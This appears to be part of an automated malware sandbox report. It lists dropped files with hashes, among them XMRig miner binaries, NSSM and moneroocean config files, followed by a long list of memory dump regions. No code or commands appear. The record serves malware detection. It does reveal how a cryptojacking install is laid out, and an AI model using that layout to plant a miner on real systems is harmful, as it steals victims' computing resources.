85479efd0ad0ffbfb091ac506b926ba5bc719d78f27834d5887b059eb13cb7d7

SHA512
2e061df74563d5845d4f1a0d2356b9ebdf705bb4f3608a8f63e5ca2601f264f63cd06366503a477e5ef18698b98d3aa56e2000a127e939a34902a274b88853e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6715c8a0ab2236da84410f482b7ccc94

SHA1
995276ca1d8a60973676c9d69a9ba3a7ee5395a1

SHA256
6c6416c2dbcbb973c59b51b7b724a2dbd1add3487d4af6ea6ae30c7d980774fe

SHA512
e784d1b566a8a28fdab81b2cdd85e542b1b98426c2fd136db260480b4eea3a09fc22756235b180320b3e1f5077a9cad4bc15c8bee7ede6a1a6ac913cc39586a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53c2a16f5c08499bf18aa2f58fa730e3

SHA1
d61034c116d97d62338f38231b0063fb4c107bb6

SHA256
360e7a7f7b490156f24628a06f7d50189d44b2cea8b34392477f7c54dc2242d8

SHA512
051eea059e8bc9c9140dc8d2144a2fcee8ef57df184e121ce4c225d5718571fd29ab5d06716e2e1b11d99ebbe11b27bc006259b0b173ce89064807a9961229a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87e5439008fe16f357cf01acc584f4d6

SHA1
950e1ffe767798de4909385c432c22db2f31501d

SHA256
80ec0ee491d9843949870a38c1e4af70c8048437610ad0a4c733b4b9b94b8da6

SHA512
2406c27c20f3737f583b99af2b281a5a58e10047c5fcfac1bf2168fdaa4560e53d40fc30143ce3b9a063073774348c88ca16d6483c8c9f1a1fc610d55aca65f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20b44b27835dedd1c7ea36c6411b4d2c

SHA1
d201e5bb6a8db66635e4052fddf27593f9663fdb

SHA256
1d9831dfb0c943fa15c7039ede075c769686fb365a52f473d20088cb5cdacda0

SHA512
90396aaba280ab8cb06657aca37f071e19d0b717ae413e5d3a5a580760b4d86c429d7593701fa6bae92a1ac63718dee85f46fdd0c4b6b433cfb57d668ff9ca3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
954428eb5b0eb40796cd42527d679eaa

SHA1
b125f27890c5612bd21e93bf67916c05d774e131

SHA256
e6ddfee56669486c03aec1321c616bceb9c79f10b3815f4cd7d40090fb4e08e1

SHA512
6492295d98a4a27d50dadc755fea44e6a3367cc7a4de5b2e7abda61f83a66dab12c08b6fde5bac79f34293eb96cba79313987d86cc945efed5110fcdf7cf03fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dc54e1961a66ba55c6000eb10862d4b4

SHA1
527ce3f198ff2f23cf6eab92c4a4c7ec74ec302d

SHA256
22d0852635473d5cb86cdfba9447f90b01a7043ef7f78e05791cf0330766ac65

SHA512
49480cb9661803c1c643c1ee0618f35e994a458033aff8052d32aca255a16188c8022230491767d10db448cc13c39e18c7895aac9e85a5e7cbb569a7d9649834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
52bf9d9a16992d287379501ef216818e

SHA1
917801b9de876bcee9e1ffe4d536b4ac9c726993

SHA256
046e6a5c3e69f8af30387182375919d7f4b7c40d815f0eaa71fc5eee5aeb8862

SHA512
0a0b64de2bc3ab2f6e4e573782f89baaf0e74f43e67508dab267ad4e866f704e9e159bc693e01ffbcb816f69328fa58eed1187bb294e2c1155aeb4d717569b0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wdxk51ap.wd1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp13D1.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
8b25f31750a1bd2a5184de93c2f727c6

SHA1
a12969638354fc5268be07eda6bc4352cc40d488

SHA256
aa99ae2f4627f2d7e2a9c19474248667b8654d02f68cacbb2d644ee6e6de9da4

SHA512
b3d6c24f246d0e2afd58a4dec93007df1afaf70ea3394c03d8d661cf06570b5c6ca0337524f503b2cef113da70b65d482b8d53d77bca4941fc99a2e918f415ca

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
993bb26789d07c6ba3d0483e1697f66b

SHA1
9ccb7876dc4ddb65b2aba03737bc708f231704d5

SHA256
be170c95c392fec2dda13b4f6710cac7e9f2cf1b59d5e0ea9e3ab1906453025b

SHA512
753c77dbcea361b403abd05bd594af8c924b246960b8e9375dcc51d75d47abf08af37eefa2ea3139301cf97c5cd27c71834155f53f00565495f78f01c006dc5a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
71469039aeadb148b9be6bef59efea0e

SHA1
368aae717236f31850399ff06a973dc7e6dafedf

SHA256
a959d78ed05393b0ee462c47573deb247d69a495e5fb2eb7991c99d60b48bac2

SHA512
fd242b21996fb01f62cd6d23cd899b39890528918cd8fd145c82a4af4069b0278e601536ccecbf9d077a1c6e680a1cad416067878a72a06ea50a6546375f56f9

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1140-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-265-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-264-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-263-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-262-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-261-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-260-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-259-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-258-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-257-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-256-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-255-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-254-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-233-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-235-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-236-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-237-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-239-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-240-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-241-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-242-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-243-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-244-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-245-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-246-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-247-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-248-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-249-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-250-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-251-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-252-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-253-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2908-67-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2908-66-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2920-40-0x000001D3E57A0000-0x000001D3E57AA000-memory.dmp

Filesize
40KB

Download
memory/2920-41-0x000001D3E5B30000-0x000001D3E5B42000-memory.dmp

Filesize
72KB

Download
memory/5008-0-0x00007FFA36593000-0x00007FFA36595000-memory.dmp

Filesize
8KB

Download
memory/5008-203-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

Filesize
10.8MB

Download
memory/5008-10-0x000002BED0140000-0x000002BED0162000-memory.dmp

Filesize
136KB

Download
memory/5008-11-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

Filesize
10.8MB

Download
memory/5008-12-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

Filesize
10.8MB

Download
memory/5008-13-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

Filesize
10.8MB

Download
memory/5008-183-0x00007FFA36590000-0x00007FFA37051000-memory.dmp

Filesize
10.8MB

Download
memory/5008-174-0x00007FFA36593000-0x00007FFA36595000-memory.dmp

Filesize
8KB

Download